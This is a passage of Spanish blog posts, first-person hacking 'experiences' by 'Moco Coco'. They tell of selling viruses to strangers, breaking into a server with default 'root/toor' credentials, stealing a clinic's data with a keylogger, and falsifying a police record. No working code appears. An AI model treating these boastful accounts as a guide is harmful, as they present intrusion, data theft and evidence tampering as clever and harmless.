AL CHUPETE. EL XTEAM ES EL GRUPO DE HACKERS ARGENTINOS Y CREEMOS QUE ESTAN COMANDADOS POR EL CHACAL. A LA MIERDA EL UNDER HACKER, ESTO DEBE SALIR A LA LUZ. Entienden algo? Yo leí esto en diciembre del 2000! Eso fue antes del corralito, antes de que saliera a luz el tema “Negros de mierda” antes de que en la revista de Lanata salieran notas sobre hackers, antes de que Hernán Arrojo se suicidara, entienden? El mismo descreimiento que ustedes sienten ahora lo tuve yo, hasta la mismas ganas de cagarme de risa y decir bla bla bla senti, lo juro. No podia ser verdad toda esa mierda, era un boludo que no tenia nada que hacer, si fuera real, porque esos documentos no vieron la luz? Si era real, porque meterlo en pgp? Si era real, que mierda hacia en un documento de mdb dentro de un tutorial de Croma Verde para Adobe Premiere??? Y el que me había dado la clave de seguro era el creador, o uno que de pedo encontró lo mismo... De todas formas, era algo divertido de contar, asi que antes de hablar a viva voz en un chat o un foro, decidí mandar todo esto a tres lugares que se deleitarían por saber mas; la revista sigloXXI, Seprin, y algun que otro pasquín de mala muerte semejante. El problema fue lo que paso luego... Después de dos semanas de haber leído todo eso comenzaron las cosas extrañas. Por ejemplo, mi mail. El primer email que tuve en mi vida había sido dado de baja en yahoo y no por mi. Tras intentar recuperar la clave por medios santos y non santos descubrí la verdad y hasta el ip de donde había sido borrado. Por alguna razón que no entiendo, ese ip pertenecía a maquinas del RENAR (registro Nacional de Armas). Después comenzaron las jugarretas extrañas. Por ejemplo, la cuenta de mi msn que tanto desdeñe por llevar un nick ridículo (y por ser de Microsoft) era constantemente revisada y mis mails de hotmail leídos y marcados como no leídos, incluso los cebos que dejaba en la cuenta con Subjet tan jugosos como: “Mi Currículo” o “Fotos Privadas!” y que en realidad contenían una sarta de idioteces inconexas aparte de una linda variable que me informaba si habían sido abiertos. Otro cambio significativo que sufrí durante esa semana fue que no había ciber donde no existiese una conexión abierta a distintos organismos estatales como ser Presidencia de la Nación u otro menos importante. Bastaba que iniciara sección en cualquiera de los servicios conocidos para que de repente y sin aviso, el nbtstat me alertara de dicha realidad. Todo esto si bien no basta para ni siquiera pensar un poco, la idea de algo de todo lo leido fuese cierto me asustaba. Así que, colectivo a mano, me fui a la calle Boqueron a ver si había alguien. Por esas razones que antes les contaba, todo en la vida es una decisión binaria, solo que a veces otro apreta la Y, como lo hizo seguramente el padre de un compañero de secundaria que, años antes, compro la casa de al lado a la de Boqueron... Me asombre mucho al verlo y reconocerlo, con ese señor yo habia hablado mas de una vez porque le interesaba la Masonería tanto como a mi, asi que verlo fuera del contexto estudiante me extraño. Lo salude, no me animaba en un principio a decirle nada de la casa de al lado, ni me acerque, solo pase por el frente y él hechaba agua desde una mangera al suelo en un rito muy extraño de pulcritud. -Buenas... como le va? -Oh... (nombremio pero en diminutivo) como andas? Todo bien? -Todo bien. aca andamos, viendo para ver si compramos una casa (unico compaz de lingüística...”viendo para ver...?!?!?!”) -Mira vos. Por la zona? -Si, estoy buscando algo como esa casa de aca. -Te la recomiendo jeje... -Por? -La casa del suicidio, no la quiere nadie, esta dos mangos. -Que se mato alguien? -Parece, dicen que se mato el pibe y la familia entera, los encontraron muertos en la cama, el mes pasado fue, todavía esta la policía por aca, de vez en cuando caen, que se yo... se que la familia quiere venderla, pero no lo dejan Helado, pero aun asi respondí. -Que historia! -No, que drama. Asi cualquiera arma quilombo, aparte yo lo conoci al pibe, Nicolas se llamaba... si... era buenito, no jodia a nadie viste? Pero.. algo no le andaba bien aca –dijo señalándose la cabeza con la mano libre mientras que con la otra cerraba la canilla. -y si, seguro no? Me tome el colectivo 4 a unas cuantas cuadras, creo que me pase como 5 paradas o bien puede que me haya perdido, porque tarde mucho en llegar a mi casa. Y si era cierto? Si yo habia leido las letras de un flaco muerto como en la epoca de la dictadura? Que cobarde de mierda fui, que infiel a todo que me senti. El disquete que tenia el mdb seria victima esa noche de algun programa de borrado seguro... Que tenia que perder? Si todo eso era real un golpe de estado me hiba a limpiar en un año y capaz que hasta caian los milicos de vuelta... Y si bien corri el programa que graba sobre otro archivo uno del mismo nombre y peso para luego darle una eliminación segura, no deje de sentirme con asco a mi mismo... Moco Coco 2009 -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. http://www.taringa.net/comunidades/escritoresmalditos/ Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

45
0
Moco Coco; Experiencias: Capitulo Seis: Virusing.
Moco Coco; Experiencias: Capitulo Seis: Virusing.
InfoporAnónimo7/21/2009

Experiencias: Capitulo Seis: Virusing. El termino virusing esta acuñado siempre a la idea macabra de un soft algo satánico mayormente autoreplicable y dañino. Pero en el mundo del revez... En la universidad de la Matanza tiene otras acepciones. No se hoy día pero hasta hace un tiempo ya extenso en el pasado los que allí estudiábamos teníamos nuestros propios lenguajes y códigos. Un ejemplo claro era el termino Virusing. Para nosotros significaba DINERO RAPIDO. Entre las extenuantes horas de Calculo I e Introducción a los S.O. teníamos un breve intervalo donde un alo de extraña solidaridad y socialismo (no en el sentido político por dios!) nos tomaba de sorpresa al estar comprando panchos para varios algunos desconocidos del curso de ingreso. Me explico, la universidad resulta algo así como un súper campus para aquel que conozca o concurra a una universidad estatal corriente. Un lugar lleno de verde donde reina la pulcritud y las malas costumbres son apañadas con baños limpios y hasta papel higiénico en los mismos! Todo un logro mas considerando que... es publica. Del nivel en si no se puede hablar, puesto que e visto muy poco de otras universidades pero cada texto que en mis manos caía era analizado y consentido por quien escribe (ósea yo) El único problemita que existe es que tienen un curso de ingreso Eliminatorio. No me opongo a esto pero léase bien lo que sigue. En sus comienzos me fui a anotar con un amigo/ex hermano llamado Hernán Panetta. Hernán y yo habíamos egresado del liceo nº 8 turno noche y como resultado nuestro titulo tenia bien en claro que el nivel adquirido a nivel economía y contabilidad era respetable, no así el matemático / lógico que fue abandonado en el tercer año para ostentar un cuarto año matemático / financiero. Pues bien, este dúo se decide por meter en sistemas ya que parecía que ambos serviríamos para eso. Comenzamos así un curso de ingreso donde el primer ejercicio decía:     v / f Todavía recuerdo el estado de histeria con el que salí de esa clase. Era Griego sí, pero el mas doloroso de los griegos después “mi gran casamiento griego”. Ahí recién tuve en claro el origen de la tragedia griega, claro flaco, con cosas así... Bien con esto pretendo ilustrar el grado de susto, miedo y terror que invadió a las casi 60 personas que ocupábamos la comisión. Tras unas semanas tomaron un “parcialito” (y si, en diminutivo suena tan lindo!) claro, no tenia función el mismo, pero igual lo tomaron para que veamos nuestro nivel. Como llore en el colectivo 113 cuando vi ese 3... Dos o tres semanas, segundo parcial, primer 2 de la clase... que groso... Después del primer parcial de 60 quedamos 30, después del segundo unos 15, al examen propiamente llegamos 10 y rendimos unos 7... Resultado? La gran mayoría aprobada... Que paso? Un Moco genio matemático?? Nooooo sys_error. La cuestión fue que el examen era una idiotez. Era un filtro en el cual sino te desmoralizabas tanto con los parciales aprobabas seguro. así fue mi ingreso a la universidad. Calculo uno y las materias de Moral o Introducción a los Sistemas Operativos era tan fáciles que hasta diré eran ridículas. Pero ese resentimiento de saber que la mayoría había dejado quizás postergando de por vida un estudio universitario por una filosofía de eliminación bien marcada era lo que nos indignaba a todos. Muchos amigos (como Hernán) cambiaron el rumbo de sus vidas por eso, y nosotros que estábamos adentro nos considerábamos entre afortunados y gloriosos... éramos la nada misma en el medio del edén... Y eso nos unía como grupo. así desarrollábamos nuestras sociedades no secretas, aunque claro esta, existían gentes que no nos soportaban ni nosotros a ellos. Pero los intervalos eran para la unión y para la critica desacertada. Un día recuerdo, estando yo con un amigo del alma, Walter Lacek, devorábamos hambrientos la comida del súper de la otra cuadra y un hombre de traje y antejos negros se nos acerco y nos propuso algo muy raro. -500 por el modelo básico, 700 si logran algún resultado. Dijeron esas palabras antecedidas por un... -chicos necesitan plata? Ante la confusión nuestra el proto Smith de Matrix dijo: -Si me arman un soft con estas características, al otro día que me dan el código, les traigo el dinero en sobre, lo reparten entre los dos, o pueden armar uno cada uno, necesito un total de cinco- hablaba rápido y miraba para todos lados, inmediatamente vi sus zapatos, eran demasiado buenos para ser reales y sin embargo ahí estaban. Esos zapatos se fueron alejando con una sonrisa tras nuestra afirmativa con la promesa de regresar al día siguiente, eso si, sino decíamos nada salvo a los mas allegados que podrían contribuir a la causa con sus códigos, -pero eso ya es cosa suya –me dijo sonriente y partió. 500 o 700 era mucho para mi, y para Walter que aunque tenia mas dinero que yo igual le gustaba la idea. Me llene de preguntas irrespondibles y creo que no dormí, me la pase programando en visual basic y action script (si, eso hago cuando estoy mas al pedo que cuando hackeo, no tenia ni novia ni mas amigos que los ya mencionados a excepción del gran Morales) toda la noche pensando y programando, como quien practica para un test o que sé yo. día siguiente, día de sol insoportable aunque lindo pues hacia ya mucho frió para detestarlo demasiado. A la tardecita la universidad de la Matanza me vio unirme en feroz charla con Walter. Afirmaba él que antes había visto al personaje del día anterior, o alguien parecido, mas viejo quizás, eso había sucedido en compañía de otro que luego fue mi amigo llamado Agustín. Este ultimo también conocía de antemano a los hombres de negro que frecuentemente nos visitaban y ante mi asombro, le había dicho que se corría el rumor que esta gente era de empresas de antivirus... Pues bien, sean quienes fueran ese día vinieron a nosotros en el mismo horario y en el mismo lugar en este caso dos agentes con varios papeles que aun hoy conservo. Dichos papeles rezaban datos concretos sobre un soft para armar en tiempo indeterminado y un teléfono celular (movicom, a nombre de un tal Manuel Rosas según averigüe) al que llamaríamos al terminar. Los datos eran muy vagos, muy muy vagos, como quien quiere algo y no sabe bien como pedirlo. Tipeado en Arial 12 decían algo así: -Escrito en lenguaje de maquina. -Soft, peso max 12 kb. -función de autocopia. -Escondido en carpeta a elección. -Autostart (si, así decía) -Dejar comentarios aclaratorios y notas referenciales por cada línea. -Dejar un espacio en el lugar de acción final para añadir posteriormente código y aclarar que esta para eso. -Entregar código impreso en hoja a4, fuente clara y sencilla, de ser posible sin interlineado, si estructurado. Y disco de 3 ½ con el programa compilado. -Cualquier extensión. -Se puede copiar líneas de código pero hasta un 25% total. Eso era todo, y era mucho. Evidentemente se nos pedía un virus. Y eso programamos, un virus. Yo antes había armado virus, de hecho comencé desde el principio programando virus, me intrigaban mucho y si se lo preguntan, si, mis virus del inicio mas prematuros eran dañinos, como todo chico también me mataba haciendo payloads muy originales y copados. Pero esto era distinto. estábamos programando algo muy grande y no sabíamos para ni por quien. Tran mil intentos fallidos por averiguar quien era este señor me decidí por comenzar a escribir código. Siempre tuve una relación muy Amor / odio con Assembled. Amaba que las aplicaciones fueran tan livianas, que se liberara memoria así de rápido, pero odiaba tener que escribir con eso, era duro, feo, casi tortuoso, pero tan puro y cristalino que asustaba. Muchos hexas después concluí junto con Walter nuestros dos primeros viruses. El primero llamado VGT (no son siglas, no se me ocurrió nada original, Walter dijo que era algo como Virus para Gatos Tarados, pero creo que el alcohol lo consumía mas que la Ritalina en el momento de expresarlo) y el DooMy de él que según sé, recive su nombre de Doom y My (algo que ver con el MyDoom? Solo Dios sabe!) y Dummy por lo que el virus hacia. Mi virus no hacia mas que expresar lo especificado, el de Wall era mas complejo e interesante, tomaba varios archivos del sistema y bloqueaba varios servicios del por entonces nuevo WinXp. A las dos horas de llamar una cita concretada en ese momento tuvo lugar a unas cuadras, un café elegido por ellos. Lleve mi código y mi disquete loco en un lindo folio transparente que fue guardado en un maletín negro junto con otros mas. Fue muy interesante recibir 700 pesos para cada uno al día siguiente. Después de eso vinieron mas agentes y mas dinero y mas códigos y mas cosas, así casi me banque un año entero en la universidad hasta que... En segundo año de la susodicha carrera y tras una maratónica rendida de exámenes finales aprobando todo, me decidí a continuar con el lujoso negocio de la escritura de virus, pero algo paso. La gente esa no vino mas. En cambio, recibíamos la visita de otra gente con fines mas benevolentes, por ejemplo, se había corrido el rumor de que Walter, Agustín, Pete, una chica que no conocía y yo escribíamos viruses, y fuimos sorprendidos varias veces por gente que ofrecía trabajos de hacking con inserción de virus propios. De esa gente nunca se hablo mucho, mas que nada, porque también corrió un rumor (benditos intervalos, la sociabilidad es muy imporatne a veces) de que eran del gobierno, así que hicimos oídos sordos y un pacto de silencio sobre los objetivos planteados. Es así como varias veces supe de estas visitas en diferentes lugares y, curiosamente, siempre de Capital Federal o zonas aledañas, nunca supe nada en universidades mas chicas del interior de nuestra grandiosa Nación. así que si alguna vez pierden una monografía, o si no pueden entrar al mail porque esta muy saturada su red, o si alguna pc anda de momentos muy lenta, ya saben bien a quien deben putear. Una muestra clara de hasta donde llega la creatividad no? Le dejo aquí pues una verdad, cómanla o escúpanla, es su elección. Moco Coco 2009 Pd: curiosamente una vez ayudando a un amigo apareció un virus llamado vgt-algomas que tras atraparlo mirarlo contenía las mismas líneas que el mío. Bendito Norton Antivirus... que expuestos estaríamos sin vos no? -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. http://www.taringa.net/comunidades/escritoresmalditos/ Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

63
0
Experiencias: Capitulo Ocho: Hardwares y otros utensillos
Experiencias: Capitulo Ocho: Hardwares y otros utensillos
InfoporAnónimo7/21/2009

Experiencias: Capitulo Ocho: Hardwares y otros utensillos. -Paranoia! Que va a ser un satélite. Y ... porque espía?! -Che creo que tenemos compañía.... -Para. Que le sáco un PrintScr. Abrí el Gimp que te lo pego, lo tengo en memoria.- ordenó Walter aquella vez, ya era casi el medio día y anteriormente había espetado entre el pánico y el amor: -No, esto es un satélite espía chabon, ves? Acá están las coordenadas ves? –me corrigió severamente entre la paranoia y el asombro, casi no podía gesticular y temblaba al responderlo. Yo había dicho: -Wait! Gueit! Ya sé que es! Son las cámaras de control de transito del centro, deben ser como las de Corrientes o 9 de Julio. Pero Agustín que estaba a mi lado anteriormente había dicho que esas cámaras no podían ser cámaras ip sencillamente porque el estado no pagaría tanto. -Coordenadas en Long y Latitud? –inquirí yo ante su pregunta de: -Que es “lon_” y “lat_”? Y preguntó eso después de que viéramos que ya había amanecido. -Aguanta que esta cargándose todo en memoria, que hijo de puta, como tarda, hace una hora que esto esta así, yo lo dije! Esto va a llevar su tiempo – había bromeado antes. Mira está apareciendo un par de caracteres, que loco, parece esos programas donde te muestra como se prueban carácter por carácter para un brutal force-proseguí- están apareciendo lo... lon... lon... lon_... -decíamos a coro- abajo, la... lat... lat_.... lat_?, lon_ y lat_ ?? –nos cuestionamos los tres. La carga del programa interprete había sido larguísima, mas de media hora estuvo ahí en la misma y no había pasado nada. Yo recuerdo que antes dije: -chicos, ya entramos con el programa, ahora a esperar que novedad nos arroja, esto va a llevar su tiempo! Tomamos café? -Otro mas? Flaco te comiste ya cinco cafés en lo que va de la noche? Enfermo! Encima me mataste con el pucho todo el tiempo! Vas un atado y medio animal! Eso fue en respuesta al cigarrillo que había conseguido prender después de que el encendedor se cayera al agua en esas circunstancias tan lamentables. -No prende que hijo de puta! No prende, che Wall tenes fósforos? -Nop, si queres anda a la cocina, creo que mi vieja ya se levanto, estamos en feriado así que la guacha le pego derecho... sino mejor. La descarga del soft nos demoro también un largo rato así que la espera se haría insoportable, si de casualidad no tenia un usuario y contraseña por sacar, por eso quise volver a fumar o tomar café, aparte, conocía esos programas que interpretan comandos y cargan imágenes satelitales, demoran un año. Cuando estábamos descargando el soft del servidor atacado en cuestión se nos cruzo la idea de que tal vez era hora de borrar logs, pero esto invariablemente fue olvidado. -Uh para que esta viejito el pobre, es de cuando yo fumaba, a ver dejame a mi - y tomando el encendedor con sus manos hizo un intento- a ver ahí va, ahí va.... -No va... -Chicos... -Pará un cacho ahí estamos a ver, aguántame... -Hay que borrar logs, no sabemos que estamos bajando y si es lo que pinta, es muy groso... -Pará Agustín, le estoy prendiendo un pucho al Moco. Aguantame –dijo mirándolo de repente, y vi caer el encendedor en una taza de café caliente arruinándolo de por vida. -bueno deja Wall, no fumo. Tanto Walterius como Agustín estaban nerviosos, nunca habían hecho una cosa así, era muy fuerte para ellos, por eso se olvidaron de que había que borrarlos. La emoción había nacido minutos antes cuando Walter escribió “get consola.tar.gz”. La lista donde estaba incluido este fichero se encontraba oportunamente dentro de un directorio llamado “Consola_principal_backup” al que habíamos accedido previamente tras que nos llamo poderosamente la atención de toda la lista interminable de archivos personales del root. Aquellas carpetas no por arte de magia habían aparecido delante de nuestros incrédulos ojos, algún inescrupuloso administrador dejó sin contraseña su cuenta. Bueno si tenia una, pero sacar un root – toor como pass era como no tenerla. Me acuerdo la cara de Walter cuando entro; -Que boludo! Jajaja! Soy el re hacker! Toor! Tuuurrrrrr no podes! No podes! había gritado sacándose la cara de preocupación y resignación al ver ese “please log in” -proba “root – root” ó “admin – admin.” o “root – toor”.-descarté la fácil- Y sep,- dije yo- es obvio. Sino tenia usuario y contraseña era para morirse. Walter –concluí a lo que decia él sobre... -uhhh si, obviamente iban a estar protegidos no? Y si... que cagada, bueno Moco, encárgate vos. Que onda? Ya de por si era un logro ver ese “please log in” para Walter que, con todo lo que sabia, no conocía nada, nada, de protocolos, ni redes, ni hacking. Esa noche su virginidad sobre el traceo, sobre finger y sobre el nmap se habían borrado como una virgen vejada. Pero nada tenia comparación con haberse conectado vía ssh a su objetivo, era un el placer encarnado. El nmap estaba lento según habíamos visto, pero es que con tantos parámetros y archivos y ansiedades y objetivos distintos cualquier cosa se hacia lenta. El descubrir anteriormente a eso de las 7 am, calculo yo, que usaban unix supongo le resultó subliminal, vieron cuando no duermen por unos días? así de raro pudo ser para Wall. Analizar redes, escribir mucho en pizarras y en el paint virtualizado desde linux (sic) también era agotador para todos, a las 6 am todo es agotador. Y yo seguía tomando café desde las 00:03 cuando llegue a la casa de Walter con esa novedad. Ahora eran las 12:00 y teníamos ante nuestros ojitos todo un programa de rastreo satelital, solo faltaba bajar algunas imágenes de nuestros techos y estaríamos contentos. -5%, 4%, 3%, 2%, 3%, 3%, 4%, 2% dale puto! Daleeeeeeeeeee- 1%! 0%! (como puede tardar 0%?!?!?!) y.... Ante nuestros ojitos estaba, las coordenadas en latitudes y longitudes habían arrojado como resultado algo que no esperábamos. Un PrintScr desde el Gimp nos daba algo... Era un campo, un campo gigante y hermoso, con ríos y caminos increíbles, perplejos seguimos las hileras de pastos en dos colores, un verde mas claro seguramente mas reciente y otro, como un camino, de verde mas viejo y pisado por donde alguien caminaría hasta su casa. Con los controles en pantalla nos movimos muy suavemente adsorbiendo lo puro de ese lugar, lo inocente y lindo y alejado de nosotros que estaba. Debió ser tan lindo y prefecto como el edén entero ante la mirada de demonio resentidos. Todo era perfecto, todo... todo... -ag 768? -que? Le pregunte a Agustín -ag 768 dice en el pasto? Que?!?! -Que mierda es ag 768?!?!? -Un cartel tipo Hollywood? -No para... aguantá..., nic –hizo Walter con la lengua contra el paladar- es una plaqueta boludo. Que campo, es una plaqueta, acá comienzan los integrados mira... ahh ya se que es esto, es un programa para ver imágenes, como un jpg viewer, ahh mira, ves? Acá están los contactos y todo, estamos viendo una de esas fotos que se usan para luego replicar las placas y mandar a reimprimirlas... Pd: No dormir entre humo de cigarrillo, café un cuarto cerrado, y emocionado puede hacer que hasta el mas crudo sistema se vuelva un paraíso perdido... entonces no es nada mas que.. hardware y otros utensillos. Moco Coco 2006 (2006??!) 2009 -----------------------------------Inicio Chivo descarado----------------------------------------------------- Escritores malditos en taringa! Una comunidad que pretende orientar, compartir, guiar y conjeturar temas referidos a la creación de novelas o cualquier tipo de historia. http://www.taringa.net/comunidades/escritoresmalditos/ Invitados todos! (Sip, misma imagen que antes...) -----------------------------------Fin Chivo descarado-----------------------------------------------------

10
0
M
Moco Coco; Experiencias Capitulo 16: Arrogancia
InfoporAnónimo8/31/2009

Experiencias Capitulo 16: Arrogancia Si bien la disciplina del hacking justamente se basa en el anti dogmatismo, todo hacker es muy dogmático. Es sencillo, la policía es dogmática, es un organismo de control y herramienta indirecta del Poder Judicial, sirve liza y llanamente para imponer un dogma terminativo. Ahora bien, si la tentativa de sistematizar un dogma es impuesta a través de una fuerza, y el hacking conforma en parte una oposición nodal, porque no interpolar ambas? En el costado mas intimo de esta cuestión, el dogma siempre nace de la arrogancia. El dogma es el Arte de la Arrogancia. Ven lo emparentado que esta con el hacking? Acaso alguien puede dudar siquiera que el hacking nació de la arrogancia? A mi me pasa algo mas bien extraño con las fuerzas de la policía, En algún punto los detesto. Lo que mayormente veo (sino siempre) es un nido de arrogantes imbeciles e ignorantes crédulos y creídos, mediocres que no saben vivir y que conforman un circulo de conformismo e idolatría desmedida e hipócrita a ideales ciertos y puros. Pretenden intimidar con la fuerza e intiman con la ignorancia e indulgencia de un Neandertal armado de un palo en un hospital de discapacitados. Solo una mínima fase zafan de dicho concepto, y serán 3 o 4 que tal vez no sean ínfimas criaturas gordas de fuerzas por comer cuan cerdos, y sin lugar a duda son aquellos que realmente saben el rol a ocupar y no desmiden su vida haciendo las veces del justiciero pro-ley. Policías buenos... policías malos.... Unos imponen arrogancia, otros cumplen su buen rol, Y el rol a ocupar es imponer un dogma. Anyway nadie debería confundir dogmatismo con practicidad reglamentaria, ni mucho menos con reglamento en sí. El dogma es impuesto, mientras que el reglamento es auto impuesto y aceptado por convenio o norma social. Y si de sociedad hablo debería decir liza y llanamente que los gobiernos del mundo imponen reglas a sus sociedades en base no a las necesidades sino a un inconsciente colectivo. Es decir, tenemos acá y en todo el mundo la policía que no queremos pero que parecemos desear. Nos agraciamos con algunos malos de las películas. No digo más. La Av. Alberdi es sede a diario de condicionamientos hacker y nadie lo nota. Existe en Mataderos mas de un hacker que todavía recordara las épocas de los teléfonos públicos que perdían la chapita de abajo para intentar una conexión, o de la insipiente asomada de cabeza de los Chalking wifi. Laptop prestada en mano(siempre prestada) (digo, y ahora miro la laptop de una alumna que me fue prestada para prevenir ataques de un incomodo hijo-espía) (siempre cambiando pero no cambio mas...) me encontraba malabareando un destornillador poco hábilmente entre mis manos para sacar los cuatro tornillos de la fucking chapita. El publico situado en Alberdi entre Pilar y Lisandro de la Torre era mi victima predilecta. A pasitos de una zona precaria de monoblocks que conformaban las veces de una villa deluxe para el barrio había yo (temiendo que me roben) conectado vía PCMCIA mi plaquita para obtener una línea libre y gratuita sin damnificados de verdadera significancia. Como condenado desplegué la tapa de Compac Presario tuneada con un extraño Linux y comencé a atacar a un objetivo algo molesto con una herramienta basada en nmap y hping. Era como un ataque de locura que provocaba dicha compilación combinación de Nmap / Ping / Ethereal al servidor destino. Me habían pagado bien una gente amiga de mi santa madre para que robara datos de una computadora importante en el Instituto de Clínica y Diagnostico y luego la tirara de red o denegara para que entre en activación un keylogger que envía resultados vía ftp (también creado por mí) que había sido puesto con antelación por quien les habla. Detengamos un segundo la experiencia. Ven de que les hablo? Dos reglones arriba escribí otros dos donde nombre mi persona dos veces. Eso es arrogancia. En fin, continué haciendo aquello Los archivos requeridos los tenia en mi poder y me disponía a simplemente esperar que se desconectara... Pero entonces paso algo. Un patrullero de la Comisaría 42 se detuvo frente a mi cabina. En un alo de idiotes sin nombre y sin sentido no lo divise y continué tipeando frenético a las 3 am de un miércoles, ni un alma se sentiría. Imaginen el cuadro, una avenida desierta, buena luz pero aun así de penumbras a las 3 AM de un incomodo día de semana.Un monitor que manaba una luz vez blanca vez de color, un joven hermoso e inocentemente escuálido de sacon negro pelo corto gay y anteojos que reflejaban la dicha luz de pantalla, amablemente apoyado cuan futuro culeado contra un teléfono publico, tipeando con una laptop de la cual emergían dos cables negros gordos que iban a parar a un agujero bajo el piso. Por más idiotas ególatras que fuesen, algo tenían que sospechar no? Una luz de linterna directa a los ojos paso a través del cristal de la cabina dibujando en mi cara el logo de Telefónica de Argentina, parecería un All-Black hacker. -Mira vos, todo un jacker –se dijo uno a al otro y cerraban la puerta tras un chillido electrónico del radio- buenas noches, que esta haciendo? Atónito los mire y abrí los ojos, no sé porque pensé que la linterna no era para intimidar sino para ver si estaba drogado (pues eso parecería) pero como no lo estaba, haciendo gala de mis ojos no dilatados los mire poniendo cara de extrañado. -Trabajo, soy de Telefónica-dije-estoy haciendo un relevamiento de intereses-mentí, palabrerio vacuo pero no mucho, que se diesen cuenta que trabajaba no que era arrogante-estoy controlando teléfono por teléfono desde Gral Paz hasta Larrazabal. -Tiene documentos? -Si desde ya. -Permítame, tiene la acreditación? -No, la deje en el móvil que me pasa a buscar en una hora por Larrazabal.-mentí, porque no tenia la más puta idea de que me pedía- si quiere esperamos un cachito hasta que venga. Sin responder arrogante el policía me pereció cuando dándome la espalda (y yo pensar por un segundo en partirle la notebook en la nuca, robarle el arma mientras caía y disparar dos certeras balas a las piernas del otro en un acto de piedad para no matarlo que al final no lleve a cabo porque me temblaban las patitas) comenzó a hablar por radio y gritonear mi apellido a una radio operadora con la cual se pajerearia noche tras noche pensado si lograria voltearsela algún día. La muy puta le respondió algo que no entendí y el arrogante policía y el otro no mayor que el dirigió su mirada y me dijo: -Bien esta bien, puede retirarse, tenga cuidado. Los quince incómodos minutos en los que tejí tramas conspiratorias concluían severos y yo arrogantemente con congracia de fuckearlos. Hasta que uno de los dos dijo: -Que edad tenes? -Diecisiete señor comisario, perdon oficial (viejísimo truco enseñado por el ex marido de mi madre, sobrealagar a un poli acrecentándole el rango) -Te venís conmigo, llévate eso. -Estoy trabajando señor.(fallo el halago, la puta madre) -Vamos –dijo arrancando el cable. -pero porque me lleva? -Se lo traslada a la comisaría por averiguación de antecedentes, telefónica no contrata a menores de edad. (lo peor era que yo sabia que era mentira, Telefónica había contratado a un amigo de una amiga de un amigo a los dieciséis, eso decían...) Sin palabra alguna, tras que me saquen la PC, la charla digna de la yuta, ese códice maldito y arrogante que creen solamente ellos entender (creado por idiotas polimaniacos que no creyeron en la deducción contextual) se hizo interminable las casi diez, cuatro, o mil cuadras que duro eso. Entró el patrullero en la comisaría que desconocía por portarme bien y por no ser victima jamás de un robo y me bajaron incomodo pero suave para llevarme hasta un asiento donde tras cerrar una puertita di a una oficina llena de gente gimoteante y negrusca. Era una sala de espera poco practica. Un negro me miraba mal y yo puse cara de desesperanza, así ayudaría al cuadro escénico. Luego de dos horas de espera, sin celular porque no existían en mi vida mas que los toqueteados por mi (si,que querían? Podía hablar gratis desde mi casa o un teléfono publico, no lo necesitaba!) me llamaron desde adentro. Pase a una oficina donde una chica con cara de orto, bastante baqueteada a mi gusto, desde dos gruesos lentes y un uniforme negro apretado por lo protogorda que estaba me apellidó y nombró. Comenzó a preguntarme que hacia, dije que era empleado de telefónica, no de la empresa en si, sino de una subsidiaria (total no conocería el termino) que auditaba la seguridad de teléfonos públicos. -trabajaba-dije-eso hacia, que mas sino a las 3? -silencio – la arrogante se disponía a hablar – vamos a llamar a telefónica te parece? -si, como no.(total, estaba siendo ironica,que mierda hiba a llamar a telefónica a las 3am pudiendo simplemente dejarme adentro... aunque pensaba en que fea condena la de falso testimonio, pero no me iba a echar atrás, total algún recurso sacaría tarde o temprano de la manga ante esta manga de ignorantes)(ah que arrogante!) -Martín! (gritó) habilítame la línea. -No se puede, anda a lo toño... -Eh? Veni que no te entiendo gordo... -Que no se puede –dijo el tal oficial Martín asomando la cabeza tras la puertita y bajando el tono de voz- para que ... -para hablar con... telefónica –dijo -Ah...-algo extrañado por el cuadro-anda a lo de Antonio -Vas a quedar demorado en la comisaría un rato? Te dijeron algo? -La verdad es que no. Se hizo silencio entre los tres, se miraban unos con otros y mi acting de niño pobre me galardonaba actoralmente. -Che y no tenes ningún teléfono... -No, no me dieron ningún numero... -No, digo, un aparato para comunicarte con ellos... algo... -No... sino nos dan nada... dije mirando al piso actuando desamparo empresarial... -Mira... –dice- la cosa es que tenemos que ver.... -a ver, veni un segundo, esta Moran (el comisario) –aclaró- aparte hay quilombo con.... -Esta Moran ahora? Ahora? Y que hace este tipo... por Dios! –expresó la chica joven y cerdasea dejando entrever una trama típica mas de comisaría de barrio) Tras completar algo en un monitor chico de pantalla verde cual Unix la vi presionar una combinación de teclas que servirían o bien para guardar o bien para cerrar. -A ver ver, esperá- y torciendo la boca me dejo solo un segundo para partir con su joven Romeo al bacón de las sensaciones...Imprimió algo que cayo ante una pila de papeles iguales y abrocho la hoja antes de cerrar la puerta. En ese instante tomé el mando de la terminal y abrí el único documento reciente, era una especie de Pico (mi editor de texto de unix predilecto) pero reformado. Abrí el doc, cambie los últimos dos dígitos del DNI, e intercambie apellidos con el tal Moran... Tome el papel y... me lo comí. Enserio, eso hice, me lo comí, tome el papel y haciendo dos bollitos me lo mastique y trague violentamente. Tras casi ahogarme y volver a mi posición original vi entrar a la chica con la notebook y el cable y me dijo que me fuera. Mi esófago conocía una textura digna del 3dStudio. -Gracias-dije sincero-gracias- y sonreír mientras ella me daba vuelta la cara de orto que tenia. -Anda, anda... dijo otra vez la arrogante ahora acompañada de martín que lo mismo hacia, me pareció verlo actuar su arrogancia como quien ejerce un arte que no esta instalado en sus venas pero sabe la forma de imitarlo a la perfección a cualquier hora menos las 3 AM. Vieron? Al final, la chica, los dos policías, Moran, Martín y el resto del sistema policiaco por considerar que sabían que lo mío, por mas que fuera o no hacking era un boludez me dejaron ir. Aunque se hubiesen dado cuenta del trucheo del informe, aun asi me dejaban ir. Tenían mil quilombos burocráticos debido a la gente que mal trabaja, mil bardos personales, y estaban cansados. Dejaban ir así a una persona que desde la incomodidad de un teléfono publico en la misma avenida realmente podría haberles arruinado toda la vida, llevarlos a la locura, extorsionarlos a muerte, quemarles la carrera, hacerlos sufrir... Pero no, ellos eran tan arrogantes que creían saber que yo no hacia nada mas que cosas de chicos... Eso pensaba tras dejar atrás la puerta grande de la comisaría 42 de Mataderos, unas pocas cuadras por Lisandro de la Torre (ex Tellier) y me consagraba de saberlo, después de todo, yo también soy 